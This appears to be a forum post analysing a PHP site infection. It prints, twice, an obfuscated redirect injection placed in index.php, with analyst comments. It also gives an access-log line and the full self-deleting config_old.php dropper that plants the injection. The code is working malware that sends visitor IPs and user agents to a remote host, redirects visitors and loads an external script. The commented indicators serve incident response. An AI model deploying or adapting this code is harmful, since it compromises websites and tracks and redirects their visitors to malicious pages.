<?php /* update */
if(isset($_SERVER['HTTP_REFERER']) && !isset($_COOKIE['dataserk']) && isset($_SERVER["HTTP_USER_AGENT"])) {
$referer = $_SERVER['HTTP_REFERER'];
$user=$_SERVER["HTTP_USER_AGENT"];
$white_engine_search = base64_decode('Z29vZ2xlfGJpbmd8eWFuZGV4fGJhaWR1fHlhaG9vfGR1Y2tkdWNrZ298YXNrfG1haWwuY3xtYWlsLnJ8bGl2ZWludGVybmV0fG15c3BhY2V8dHVtYmxyfGhvdG1haWx8Z21haWx8b3JhbmdlfGdteHxhb2w');
$b1223oghhmtjhms = base64_decode('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');
$efkbgmkbmghln=array('ZHNma2pna2pudmtzZG52Y2pkZmJ2amguaW5mbw');
$efkbgmkbmghln=$efkbgmkbmghln[array_rand($efkbgmkbmghln)];
if (preg_match("/(".$white_engine_search.")/i" , $referer)){
// Analyst note: this run executes only when the Referer matched the case-insensitive
// regex built from $white_engine_search, which decodes to
// "google|bing|yandex|baidu|yahoo|duckduckgo|ask|mail.c|mail.r|liveinternet|myspace|tumblr|hotmail|gmail|orange|gmx|aol".
// $oc is the pipe-separated list of User-Agent substrings decoded into $b1223oghhmtjhms.
$oc = explode('|',$b1223oghhmtjhms);
// A User-Agent match only sets the "dataserk" cookie and leaves the loop.
foreach($oc as $val){if(strpos($user,$val) !== FALSE){setcookie("dataserk","vitedid6fe1d0be634",time()+2592000, "/"); break;}}
// The same cookie is then set unconditionally (2592000 s = 30 days, path "/").
// The outer condition requires this cookie to be absent, so a request that already
// carries it skips the whole injected block.
setcookie("dataserk","vitedid6fe1d0be634",time()+2592000, "/");
// Decodes to "/index/?7561576265124"; appended to the redirect target further down.
$ed6fe1d0be6347b8e = base64_decode("L2luZGV4Lz83NTYxNTc2MjY1MTI0");
// Analyst note: fetches the URL held (base64-encoded) in the global
// $v634894f9845d8dc65 and JSON-decodes the response body.
// Returns the decoded array when its "domain" key is truthy, otherwise the integer 1.
// Uses cURL when available, else file_get_contents().
function v64547f9857d8dc65(){
global $v634894f9845d8dc65;
// Fallback return value when the response carries no usable "domain" entry.
$dats = 1;
if(function_exists('curl_version')){
$kd88fc6edf21ea464 = curl_init();
curl_setopt($kd88fc6edf21ea464, CURLOPT_RETURNTRANSFER, true);
// Decodes to the fixed User-Agent "newrequest" -- a stable string to look for in
// egress proxy or firewall logs.
curl_setopt($kd88fc6edf21ea464, CURLOPT_USERAGENT, base64_decode('bmV3cmVxdWVzdA=='));
curl_setopt($kd88fc6edf21ea464, CURLOPT_URL, base64_decode($v634894f9845d8dc65));
curl_setopt($kd88fc6edf21ea464, CURLOPT_TIMEOUT, 10);
$mb4a88417b3d0170d = curl_exec($kd88fc6edf21ea464);
curl_close($kd88fc6edf21ea464);
$ke4e46deb7f9cc58c = json_decode($mb4a88417b3d0170d, true);
// 'ZG9tYWlu' decodes to "domain".
if ($ke4e46deb7f9cc58c[base64_decode('ZG9tYWlu') ]) {
return $ke4e46deb7f9cc58c;
}else{
return $dats;
}
}else{
// No cURL: same request through the URL stream wrapper; the custom User-Agent and
// the 10 s timeout are not applied on this path.
$mb4a88417b3d0170d = file_get_contents(base64_decode($v634894f9845d8dc65));
$ke4e46deb7f9cc58c = json_decode($mb4a88417b3d0170d, true);
if ($ke4e46deb7f9cc58c[base64_decode('ZG9tYWlu') ]) {
return $ke4e46deb7f9cc58c;
}else{
return $dats;
}
}
// Unreachable: every branch above has already returned.
return false;
}
// Analyst note: picks the visitor address, preferring the Client-IP and
// X-Forwarded-For request headers (both client-supplied) over REMOTE_ADDR.
if (!empty($_SERVER['HTTP_CLIENT_IP'])){
$ip = $_SERVER['HTTP_CLIENT_IP'];
}elseif(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
// Visitor record sent to the remote host: ip|user-agent|server name|timestamp|referer.
$gnjkhkgjfhkhh = $ip.'|'.$user.'|'.$_SERVER['SERVER_NAME'].'|'.time().'|'.$_SERVER['HTTP_REFERER'];
// Builds "http://" + host + "/?params=" + base64(record) and stores it base64-encoded
// in the global read by v64547f9857d8dc65(). $efkbgmkbmghln is the single host entry
// assigned earlier in this snippet; it decodes to dsfkjgkjnvksdnvcjdfbvjh[.]info
// (defanged). An outbound request from the web server to that host with a "params="
// query string is a network indicator of this infection.
$v634894f9845d8dc65 = base64_encode(base64_decode('aHR0cDovLw').base64_decode($efkbgmkbmghln).base64_decode('Lz9wYXJhbXM9').base64_encode($gnjkhkgjfhkhh));
$m9b207167e5381c47 = v64547f9857d8dc65();
// Analyst note: the remote response decides where the visitor is sent.
// 'ZG9tYWlu' decodes to "domain".
if ($m9b207167e5381c47[base64_decode('ZG9tYWlu') ]) {
// Target is "http://" + <domain from the response> + $ed6fe1d0be6347b8e
// ("/index/?7561576265124").
$ye617ef6974faced4 = base64_decode('aHR0cDovLw==') . $m9b207167e5381c47[base64_decode('ZG9tYWlu') ] . $ed6fe1d0be6347b8e;
// 'TG9jYXRpb246IA==' decodes to "Location: ". There is no exit in this branch, so
// execution continues past the header() call.
header(base64_decode('TG9jYXRpb246IA==') . $ye617ef6974faced4);
}else{
// No domain returned: respond with a bare HTML page whose inline script loads
// hxxps://astanthemi[.]tk/tmp.js (defanged) and stop, so the site's own page is
// never rendered for this request.
$sitesjs = base64_decode('aHR0cHM6Ly9hc3RhbnRoZW1pLnRrL3RtcC5qcw');
$letters = array('a','s','d','f','g','h','j','k','l','z','x','c','v','b','n','m','q','w','e');
// Two random letters are appended to the JavaScript variable name "elemsa", so the
// emitted markup differs between responses.
$letters = $letters[array_rand($letters)].$letters[array_rand($letters)];
echo "<html><head></head><body><script>var elemsa$letters = document.createElement(\"script\"); elemsa$letters.src = '$sitesjs'; document.head.appendChild(elemsa$letters);</script></body></html>";
exit;
}
}
} /* update */ ?><?php /* update */
if(isset($_SERVER['HTTP_REFERER']) && !isset($_COOKIE['dataserk']) && isset($_SERVER["HTTP_USER_AGENT"])) {
$referer = $_SERVER['HTTP_REFERER'];
$user=$_SERVER["HTTP_USER_AGENT"];
$white_engine_search = base64_decode('Z29vZ2xlfGJpbmd8eWFuZGV4fGJhaWR1fHlhaG9vfGR1Y2tkdWNrZ298YXNrfG1haWwuY3xtYWlsLnJ8bGl2ZWludGVybmV0fG15c3BhY2V8dHVtYmxyfGhvdG1haWx8Z21haWx8b3JhbmdlfGdteHxhb2w');
$b1223oghhmtjhms = base64_decode('QWRzQm90LUdvb2dsZXxBaHJlZnNCb3QvfEFwYWNoZS1IdHRwQ2xpZW50L3xCYWlkdXNwaWRlci98Q05DYXQvfERldVN1L3xEb3RCb3QvfEdvb2dsZSBmYXZpY29ufEdvb2dsZS1TaXRlLVZlcmlmaWNhdGlvbi98R29vZ2xlYm90LUltYWdlLzEuMHxHb29nbGVib3QvfEdyYXBlc2hvdENyYXdsZXIvfEd1enpsZUh0dHAvfEphdmEvMS58TGlua1N0YXRzIHxMaW5rcGFkQm90L3xMaW5rc01hc3RlclJvQm90L3xNSjEyYm90L3xNYWlsLlJVX0JvdC98TWVnYUluZGV4LnJ1L3xOZXRTZWVyIGNyYXdsZXIvfE5ldGNhdCBCb3R8T2RrbEJvdC98UmlkZGxlcnxSb29rZWVCb3R8UnVuZXQtUmVzZWFyY2gtQ3Jhd2xlcnxTZW1ydXNoQm90L3xTZW9wdWx0Q29udGVudEFuYWx5emVyfFNwdXRuaWtGYXZpY29uQm90L3xTdGF0T25saW5lUnVCb3QvfFN1cnZleUJvdC98VmFsaWRhdG9yLm51L3xXM0NfVmFsaWRhdG9yL3xXZWItTW9uaXRvcmluZy98V2ViQXJ0ZXhCb3R8V2Vic3F1YXNoLmNvbXxZIUotQVNSL3xZYURpcmVjdEZldGNoZXIvfFlhaG9vISBTbHVycHxZYW5kZXgvfFlhbmRleEJvdC98WWFuZGV4RGlyZWN0L3xZYW5kZXhJbWFnZXMvfFlhbmRleE1ldHJpa2EvfFlhbmRleE1vYmlsZUJvdC98WWFuZGV4V2VibWFzdGVyL3xhcmNoaXZlLm9yZ19ib3R8YmluZ2JvdC98Ym90L051dGNoLXxlU3luZGlDYXQgQm90fGZhY2Vib29rZXh0ZXJuYWxoaXQvfHBlYXIucGhwLm5ldHxsaW5rZGV4Ym90L3xsdHg3MXxtZWFucGF0aGJvdC98bmV0RXN0YXRlfG9wZW5zdGF0LnJ1L3xwYXJzZXIzfHByLWN5LnJ1fHB5dGhvbi1yZXF1ZXN0cy98cm9nZXJib3QvfHN0YXRkb20ucnUvfHRyZW5kaWN0aW9ufFBIUC98dmtTaGFyZXxDVUJPVF9OT1RFX1N8R29vZ2xlYm90L3xBZHNCb3QtR29vZ2xlfFRrQm90L3xZYW5kZXhBbnRpdmlydXN8TWFpbC5SVV9Cb3Q');
$efkbgmkbmghln=array('ZHNma2pna2pudmtzZG52Y2pkZmJ2amguaW5mbw');
$efkbgmkbmghln=$efkbgmkbmghln[array_rand($efkbgmkbmghln)];
if (preg_match("/(".$white_engine_search.")/i" , $referer)){
// Analyst note: this run executes only when the Referer matched the case-insensitive
// regex built from $white_engine_search, which decodes to
// "google|bing|yandex|baidu|yahoo|duckduckgo|ask|mail.c|mail.r|liveinternet|myspace|tumblr|hotmail|gmail|orange|gmx|aol".
// $oc is the pipe-separated list of User-Agent substrings decoded into $b1223oghhmtjhms.
$oc = explode('|',$b1223oghhmtjhms);
// A User-Agent match only sets the "dataserk" cookie and leaves the loop.
foreach($oc as $val){if(strpos($user,$val) !== FALSE){setcookie("dataserk","vitedid6fe1d0be634",time()+2592000, "/"); break;}}
// The same cookie is then set unconditionally (2592000 s = 30 days, path "/").
// The outer condition requires this cookie to be absent, so a request that already
// carries it skips the whole injected block.
setcookie("dataserk","vitedid6fe1d0be634",time()+2592000, "/");
// Decodes to "/index/?7561576265124"; appended to the redirect target further down.
$ed6fe1d0be6347b8e = base64_decode("L2luZGV4Lz83NTYxNTc2MjY1MTI0");
// Analyst note: fetches the URL held (base64-encoded) in the global
// $v634894f9845d8dc65 and JSON-decodes the response body.
// Returns the decoded array when its "domain" key is truthy, otherwise the integer 1.
// Uses cURL when available, else file_get_contents().
function v64547f9857d8dc65(){
global $v634894f9845d8dc65;
// Fallback return value when the response carries no usable "domain" entry.
$dats = 1;
if(function_exists('curl_version')){
$kd88fc6edf21ea464 = curl_init();
curl_setopt($kd88fc6edf21ea464, CURLOPT_RETURNTRANSFER, true);
// Decodes to the fixed User-Agent "newrequest" -- a stable string to look for in
// egress proxy or firewall logs.
curl_setopt($kd88fc6edf21ea464, CURLOPT_USERAGENT, base64_decode('bmV3cmVxdWVzdA=='));
curl_setopt($kd88fc6edf21ea464, CURLOPT_URL, base64_decode($v634894f9845d8dc65));
curl_setopt($kd88fc6edf21ea464, CURLOPT_TIMEOUT, 10);
$mb4a88417b3d0170d = curl_exec($kd88fc6edf21ea464);
curl_close($kd88fc6edf21ea464);
$ke4e46deb7f9cc58c = json_decode($mb4a88417b3d0170d, true);
// 'ZG9tYWlu' decodes to "domain".
if ($ke4e46deb7f9cc58c[base64_decode('ZG9tYWlu') ]) {
return $ke4e46deb7f9cc58c;
}else{
return $dats;
}
}else{
// No cURL: same request through the URL stream wrapper; the custom User-Agent and
// the 10 s timeout are not applied on this path.
$mb4a88417b3d0170d = file_get_contents(base64_decode($v634894f9845d8dc65));
$ke4e46deb7f9cc58c = json_decode($mb4a88417b3d0170d, true);
if ($ke4e46deb7f9cc58c[base64_decode('ZG9tYWlu') ]) {
return $ke4e46deb7f9cc58c;
}else{
return $dats;
}
}
// Unreachable: every branch above has already returned.
return false;
}
// Analyst note: picks the visitor address, preferring the Client-IP and
// X-Forwarded-For request headers (both client-supplied) over REMOTE_ADDR.
if (!empty($_SERVER['HTTP_CLIENT_IP'])){
$ip = $_SERVER['HTTP_CLIENT_IP'];
}elseif(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
// Visitor record sent to the remote host: ip|user-agent|server name|timestamp|referer.
$gnjkhkgjfhkhh = $ip.'|'.$user.'|'.$_SERVER['SERVER_NAME'].'|'.time().'|'.$_SERVER['HTTP_REFERER'];
// Builds "http://" + host + "/?params=" + base64(record) and stores it base64-encoded
// in the global read by v64547f9857d8dc65(). $efkbgmkbmghln is the single host entry
// assigned earlier in this snippet; it decodes to dsfkjgkjnvksdnvcjdfbvjh[.]info
// (defanged). An outbound request from the web server to that host with a "params="
// query string is a network indicator of this infection.
$v634894f9845d8dc65 = base64_encode(base64_decode('aHR0cDovLw').base64_decode($efkbgmkbmghln).base64_decode('Lz9wYXJhbXM9').base64_encode($gnjkhkgjfhkhh));
$m9b207167e5381c47 = v64547f9857d8dc65();
// Analyst note: the remote response decides where the visitor is sent.
// 'ZG9tYWlu' decodes to "domain".
if ($m9b207167e5381c47[base64_decode('ZG9tYWlu') ]) {
// Target is "http://" + <domain from the response> + $ed6fe1d0be6347b8e
// ("/index/?7561576265124").
$ye617ef6974faced4 = base64_decode('aHR0cDovLw==') . $m9b207167e5381c47[base64_decode('ZG9tYWlu') ] . $ed6fe1d0be6347b8e;
// 'TG9jYXRpb246IA==' decodes to "Location: ". There is no exit in this branch, so
// execution continues past the header() call.
header(base64_decode('TG9jYXRpb246IA==') . $ye617ef6974faced4);
}else{
// No domain returned: respond with a bare HTML page whose inline script loads
// hxxps://astanthemi[.]tk/tmp.js (defanged) and stop, so the site's own page is
// never rendered for this request.
$sitesjs = base64_decode('aHR0cHM6Ly9hc3RhbnRoZW1pLnRrL3RtcC5qcw');
$letters = array('a','s','d','f','g','h','j','k','l','z','x','c','v','b','n','m','q','w','e');
// Two random letters are appended to the JavaScript variable name "elemsa", so the
// emitted markup differs between responses.
$letters = $letters[array_rand($letters)].$letters[array_rand($letters)];
echo "<html><head></head><body><script>var elemsa$letters = document.createElement(\"script\"); elemsa$letters.src = '$sitesjs'; document.head.appendChild(elemsa$letters);</script></body></html>";
exit;
}
}
} /* update */ ?>
After checking the logs I discovered this:
[28/Feb/2020:10:56:53 +0200] "POST /catalog/controller/affiliate/image.php HTTP/1.1" 200 41 "*****.com/catalog/controller/affiliate/image.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
A file named config_old.php is created in the admin folder; this is the file that modifies index.php in the web root. The code inserted into index.php causes users to be redirected to malicious sites!
The attacker used the application installed on the server to access site files without authorization and to infect them. Instead of uploading an image to the server for editing, the attacker sent malicious code encoded in base64, which was then automatically renamed to config_old.php and then infected index.php.
config_old.php content
<?php
$dt = base64_decode('PD9waHAgLyogdXBkYXRlICovDQppZihpc3NldCgkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10pICYmICFpc3NldCgkX0NPT0tJRVsnZGF0YXNlcmsnXSkgJiYgaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSkgew0KCSRyZWZlcmVyID0gJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KCSR1c2VyPSRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXTsNCgkkd2hpdGVfZW5naW5lX3NlYXJjaCA9IGJhc2U2NF9kZWNvZGUoJ1oyOXZaMnhsZkdKcGJtZDhlV0Z1WkdWNGZHSmhhV1IxZkhsaGFHOXZmR1IxWTJ0a2RXTnJaMjk4WVhOcmZHMWhhV3d1WTN4dFlXbHNMbko4ZEdWc1pXZHlZVzE4YkdsMlpXbHVkR1Z5Ym1WMGZIZGxZMmhoZEh4dGVYTndZV05sZkhSMWJXSnNjbnhzYVc1clpXUnBibnh5WldSa2FYUjhjR2x1ZEdWeVpYTjBmSFIzYVhSMFpYSjhhVzV6ZEdGbmNtRnRmR1poWTJWaWIyOXJmSFpyTG1OOGFHOTBiV0ZwYkh4bmJXRnBiSHh2Y21GdVoyVjhiMnN1Y25WOFoyMTRmR0Z2YkEnKTsNCgkkYjEyMjNvZ2hobXRqaG1zID0gYmFzZTY0X2RlY29kZSgnUVdSelFtOTBMVWR2YjJkc1pYeEJhSEpsWm5OQ2IzUXZmRUZ3WVdOb1pTMUlkSFJ3UTJ4cFpXNTBMM3hDWVdsa2RYTndhV1JsY2k5OFEwNURZWFF2ZkVSbGRWTjFMM3hFYjNSQ2IzUXZmRWR2YjJkc1pTQm1ZWFpwWTI5dWZFZHZiMmRzWlMxVGFYUmxMVlpsY21sbWFXTmhkR2x2Ymk5OFIyOXZaMnhsWW05MExVbHRZV2RsTHpFdU1IeEhiMjluYkdWaWIzUXZmRWR5WVhCbGMyaHZkRU55WVhkc1pYSXZmRWQxZW5wc1pVaDBkSEF2ZkVwaGRtRXZNUzU4VEdsdWExTjBZWFJ6SUh4TWFXNXJjR0ZrUW05MEwzeE1hVzVyYzAxaGMzUmxjbEp2UW05MEwzeE5TakV5WW05MEwzeE5ZV2xzTGxKVlgwSnZkQzk4VFdWbllVbHVaR1Y0TG5KMUwzeE9aWFJUWldWeUlHTnlZWGRzWlhJdmZFNWxkR05oZENCQ2IzUjhUMlJyYkVKdmRDOThVbWxrWkd4bGNueFNiMjlyWldWQ2IzUjhVblZ1WlhRdFVtVnpaV0Z5WTJndFEzSmhkMnhsY254VFpXMXlkWE5vUW05MEwzeFRaVzl3ZFd4MFEyOXVkR1Z1ZEVGdVlXeDVlbVZ5ZkZOd2RYUnVhV3RHWVhacFkyOXVRbTkwTDN4VGRHRjBUMjVzYVc1bFVuVkNiM1F2ZkZOMWNuWmxlVUp2ZEM5OFZtRnNhV1JoZEc5eUxtNTFMM3hYTTBOZlZtRnNhV1JoZEc5eUwzeFhaV0l0VFc5dWFYUnZjbWx1Wnk5OFYyVmlRWEowWlhoQ2IzUjhWMlZpYzNGMVlYTm9MbU52Ylh4WklVb3RRVk5TTDN4WllVUnBjbVZqZEVabGRHTm9aWEl2ZkZsaGFHOXZJU0JUYkhWeWNIeFpZVzVrWlhndmZGbGhibVJsZUVKdmRDOThXV0Z1WkdWNFJHbHlaV04wTDN4WllXNWtaWGhKYldGblpYTXZmRmxoYm1SbGVFMWxkSEpwYTJFdmZGbGhibVJsZUUxdlltbHNaVUp2ZEM5OFdXRnVaR1Y0VjJWaWJXRnpkR1Z5TDN4aGNtTm9hWFpsTG05eVoxOWliM1I4WW1sdVoySnZkQzk4WW05MEwwNTFkR05vTFh4bFUzbHVaR2xEWVhRZ1FtOTBmR1poWTJWaWIyOXJaWGgwWlhKdVlXeG9hWFF2Zkh
CbFlYSXVjR2h3TG01bGRIeHNhVzVyWkdWNFltOTBMM3hzZEhnM01YeHRaV0Z1Y0dGMGFHSnZkQzk4Ym1WMFJYTjBZWFJsZkc5d1pXNXpkR0YwTG5KMUwzeHdZWEp6WlhJemZIQnlMV041TG5KMWZIQjVkR2h2YmkxeVpYRjFaWE4wY3k5OGNtOW5aWEppYjNRdmZITjBZWFJrYjIwdWNuVXZmSFJ5Wlc1a2FXTjBhVzl1ZkZCSVVDOThkbXRUYUdGeVpRJyk7DQoJJGVma2JnbWtibWdobG49YXJyYXkoJ2RHaGxlR1ppWm1kaWFHNXFiV3BxWm1kaVltUm1kbVpuTG1sdVptOCcpOw0KCSRlZmtiZ21rYm1naGxuPSRlZmtiZ21rYm1naGxuW2FycmF5X3JhbmQoJGVma2JnbWtibWdobG4pXTsNCglpZiAocHJlZ19tYXRjaCgiLygiLiR3aGl0ZV9lbmdpbmVfc2VhcmNoLiIpL2kiICwgJHJlZmVyZXIpKXsNCgkJJG9jID0gZXhwbG9kZSgnfCcsJGIxMjIzb2doaG10amhtcyk7DQoJCWZvcmVhY2goJG9jIGFzICR2YWwpe2lmKHN0cnBvcygkdXNlciwkdmFsKSAhPT0gRkFMU0Upe3NldGNvb2tpZSgiZGF0YXNlcmsiLCJ2aXRlZGlkNmZlMWQwYmU2MzQiLHRpbWUoKSsyNTkyMDAwLCAiLyIpOyBicmVhazt9fQ0KCQlzZXRjb29raWUoImRhdGFzZXJrIiwidml0ZWRpZDZmZTFkMGJlNjM0Iix0aW1lKCkrMjU5MjAwMCwgIi8iKTsNCgkJJGVkNmZlMWQwYmU2MzQ3YjhlID0gYmFzZTY0X2RlY29kZSgiTDJsdVpHVjRMejgzTlRZeE5UYzJNalkxTVRJMCIpOw0KCQlmdW5jdGlvbiB2NjQ1NDdmOTg1N2Q4ZGM2NSgpew0KCQkJZ2xvYmFsICR2NjM0ODk0Zjk4NDVkOGRjNjU7DQoJCQlpZihmdW5jdGlvbl9leGlzdHMoJ2N1cmxfdmVyc2lvbicpKXsNCgkJCQkka2Q4OGZjNmVkZjIxZWE0NjQgPSBjdXJsX2luaXQoKTsNCgkJCQljdXJsX3NldG9wdCgka2Q4OGZjNmVkZjIxZWE0NjQsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOw0KCQkJCWN1cmxfc2V0b3B0KCRrZDg4ZmM2ZWRmMjFlYTQ2NCwgQ1VSTE9QVF9VU0VSQUdFTlQsIGJhc2U2NF9kZWNvZGUoJ2JtVjNjbVZ4ZFdWemRBPT0nKSk7DQoJCQkJY3VybF9zZXRvcHQoJGtkODhmYzZlZGYyMWVhNDY0LCBDVVJMT1BUX1VSTCwgYmFzZTY0X2RlY29kZSgkdjYzNDg5NGY5ODQ1ZDhkYzY1KSk7DQoJCQkJY3VybF9zZXRvcHQoJGtkODhmYzZlZGYyMWVhNDY0LCBDVVJMT1BUX1RJTUVPVVQsIDEwKTsNCgkJCQkkbWI0YTg4NDE3YjNkMDE3MGQgPSBjdXJsX2V4ZWMoJGtkODhmYzZlZGYyMWVhNDY0KTsNCgkJCQljdXJsX2Nsb3NlKCRrZDg4ZmM2ZWRmMjFlYTQ2NCk7DQoJCQkJJGtlNGU0NmRlYjdmOWNjNThjID0ganNvbl9kZWNvZGUoJG1iNGE4ODQxN2IzZDAxNzBkLCB0cnVlKTsNCgkJCQlpZiAoJGtlNGU0NmRlYjdmOWNjNThjW2Jhc2U2NF9kZWNvZGUoJ1pHOXRZV2x1JykgXSkgew0KCQkJCQlyZXR1cm4gJGtlNGU0NmRlYjdmOWNjNThjOw0KCQkJCX0NCgkJCX1lbHNlew0KCQkJCSRtYjRhODg0MTdiM2QwMTcwZCA9IGZpbGVfZ2V0X2NvbnRlbnRzKGJhc2U2NF9kZWNvZGUoJHY2MzQ4OTRmOTg0NWQ4ZGM2NSkpOw0
KCQkJCSRrZTRlNDZkZWI3ZjljYzU4YyA9IGpzb25fZGVjb2RlKCRtYjRhODg0MTdiM2QwMTcwZCwgdHJ1ZSk7DQoJCQkJaWYgKCRrZTRlNDZkZWI3ZjljYzU4Y1tiYXNlNjRfZGVjb2RlKCdaRzl0WVdsdScpIF0pIHsNCgkJCQkJcmV0dXJuICRrZTRlNDZkZWI3ZjljYzU4YzsNCgkJCQl9CQkNCgkJCX0NCgkJCXJldHVybiBmYWxzZTsNCgkJfQ0KCQlpZiAoIWVtcHR5KCRfU0VSVkVSWydIVFRQX0NMSUVOVF9JUCddKSl7DQoJCQkkaXAgPSAkX1NFUlZFUlsnSFRUUF9DTElFTlRfSVAnXTsNCgkJfWVsc2VpZighZW1wdHkoJF9TRVJWRVJbJ0hUVFBfWF9GT1JXQVJERURfRk9SJ10pKSB7DQoJCQkkaXAgPSAkX1NFUlZFUlsnSFRUUF9YX0ZPUldBUkRFRF9GT1InXTsNCgkJfWVsc2V7DQoJCQkkaXAgPSAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTsNCgkJfQ0KCQkkZ25qa2hrZ2pmaGtoaCA9ICRpcC4nfCcuJHVzZXIuJ3wnLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLid8Jy50aW1lKCkuJ3wnLiRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCgkJJHY2MzQ4OTRmOTg0NWQ4ZGM2NSA9IGJhc2U2NF9lbmNvZGUoYmFzZTY0X2RlY29kZSgnYUhSMGNEb3ZMdycpLmJhc2U2NF9kZWNvZGUoJGVma2JnbWtibWdobG4pLmJhc2U2NF9kZWNvZGUoJ0x6OXdZWEpoYlhNOScpLmJhc2U2NF9lbmNvZGUoJGduamtoa2dqZmhraGgpKTsNCgkJJG05YjIwNzE2N2U1MzgxYzQ3ID0gdjY0NTQ3Zjk4NTdkOGRjNjUoKTsNCgkJaWYgKCRtOWIyMDcxNjdlNTM4MWM0N1tiYXNlNjRfZGVjb2RlKCdaRzl0WVdsdScpIF0pIHsNCgkJCSR5ZTYxN2VmNjk3NGZhY2VkNCA9IGJhc2U2NF9kZWNvZGUoJ2FIUjBjRG92THc9PScpIC4gJG05YjIwNzE2N2U1MzgxYzQ3W2Jhc2U2NF9kZWNvZGUoJ1pHOXRZV2x1JykgXSAuICRlZDZmZTFkMGJlNjM0N2I4ZTsNCgkJCWhlYWRlcihiYXNlNjRfZGVjb2RlKCdURzlqWVhScGIyNDZJQT09JykgLiAkeWU2MTdlZjY5NzRmYWNlZDQpOw0KCQl9DQoJfQ0KfSAvKiB1cGRhdGUgKi8gPz4');
// Analyst note: rewrites <DOCUMENT_ROOT>/index.php so that the decoded payload in $dt
// (assigned above) sits in front of the site's own code.
$path = $_SERVER['DOCUMENT_ROOT'];
$path = rtrim($path, '/');
if(file_exists($path.'/index.php')){
$dts = file_get_contents($path.'/index.php');
// 'global $v634894f9845d8dc65' is used as the "already infected" marker. The same
// string is a usable signature when scanning a web root for this injection.
if(strpos($dts,'global $v634894f9845d8dc65') !== false){
// Each injected copy ends with '} /* update */ ?>'. Split on that terminator and keep
// the first of segments 1-4 that does not contain the marker, i.e. the text that
// follows the earlier injection(s).
$dtss = explode('} /* update */ ?>',$dts);
if(isset($dtss[1]) && strpos($dtss[1],'global $v634894f9845d8dc65') === false){
$dts = $dtss[1];
}elseif(isset($dtss[2]) && strpos($dtss[2],'global $v634894f9845d8dc65') === false){
$dts = $dtss[2];
}elseif(isset($dtss[3]) && strpos($dtss[3],'global $v634894f9845d8dc65') === false){
$dts = $dtss[3];
}elseif(isset($dtss[4]) && strpos($dtss[4],'global $v634894f9845d8dc65') === false){
$dts = $dtss[4];
}else{
// No marker-free segment found: the existing file content is discarded, so the
// original index.php may have to be restored from a known-good copy.
$dts = '';
}
}
// Payload first, then whatever was kept of the existing file.
$dts = $dt.$dts;
file_put_contents($path.'/index.php', $dts);
}
// Analyst note: self-removal. After index.php has been rewritten the dropper deletes
// its own file, so it may no longer be on disk when the site is examined; the web
// server access log is then the remaining record of the request that ran it.
// $path and $filename are assigned but not used in the lines shown here.
$path = dirname(__FILE__);
$filename = $_SERVER['PHP_SELF'];
// Opens PHP_SELF (the script's URL path, not necessarily a filesystem path) with 'w+',
// which truncates the target if the open succeeds; $fp is not used or closed afterwards.
$fp = fopen($_SERVER['PHP_SELF'], 'w+');
if(file_exists($_SERVER['SCRIPT_FILENAME'])){
unlink($_SERVER['SCRIPT_FILENAME']);
}
if(file_exists(__FILE__)){
unlink(__FILE__);
}
?>
https://www.imunify360.com/blog/malware ... -processor